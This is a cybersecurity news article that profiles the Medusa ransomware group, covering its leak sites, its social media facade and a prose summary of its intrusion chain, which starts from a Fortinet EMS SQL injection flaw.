Medusa Ransomware Exploits Fortinet Flaw in Devastating Cyber Attacks

Medusa, a prominent ransomware group, operates on both the surface web and dark web, posting victim information regularly, as their online presence and rapid attack rate have drawn attention, though their operational practices warrant closer examination.

The Medusa ransomware is a distinct malware family that differs from other threats like MedusaLocker and Medusa Android, which employ unique methods for encryption and extortion, posing a specific cybersecurity risk.

A ransomware-as-a-service operator has increased its attack frequency in 2024, targeting a diverse range of sectors and geographic locations. The group’s profit-sharing model incentivizes affiliates, resulting in a significant rise in victims.

Different Sites 

It operates a dark web blog accessible through Tor, where the blog features posts about recent cyberattacks, including data breaches and leaks. Victims are given a limited time to pay a ransom in Bitcoin to prevent data release or deletion.

Ransomware group maintains a dark web presence for operations but unusually has a clear web alias “OSINT Without Borders” with a website and social media profiles. Connections like logo sharing suggest these are likely facades for the same entity. 

OSINT Without Borders, a blog suspected to be run by Medusa ransomware, raises concerns for promoting their leaks and potentially aiding intelligence gathering for future attacks. 

osintcopr.net Banner, Disclaimer, and Telegram Link

It uses multiple social media accounts (X account, Facebook page) associated with Robert Vroofdown and Robert Enaber, as these accounts are unusual for ransomware groups.

The ransomware group Medusa uses Telegram for information sharing and maintains an active channel with over 700 files, while their X link redirects to search results. 

Dark Atlas exploited a configuration file leak to compromise Medusa’s cloud account authentication, exposing victim data and hindering their operations. 

They exploit known vulnerabilities to execute their attacks by leveraging these weaknesses to gain unauthorized access and deploy ransomware payloads, often evading detection through advanced techniques.

The ransomware attack 

Medusa exploits the SQL injection vulnerability in Fortinet EMS to gain initial access, establishes persistence using RMM tools and registry modifications, and executes PowerShell commands to maintain control over the compromised system.

It exploits vulnerable servers to obtain credentials and laterally moves to other hosts using bitsadmin or PSExec, and then executes gaze.exe to kill services, loads TOR links for data exfiltration, and encrypts files using RSA encryption. 

 Medusa ransom note excerpt

It also leverages vulnerable drivers to identify and terminate anti-malware processes, bypassing security measures. The ransomware note informs victims of the breach and provides instructions for contacting the group to restore data and prevent data exposure.

According to Bitfender, a ransomware group has evolved its communication methods and capabilities, making it difficult to track and respond to its attacks, posing a significant challenge for security experts.

Organizations can enhance their security posture by implementing a multi-layered approach, including prevention, protection, detection, and response measures. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here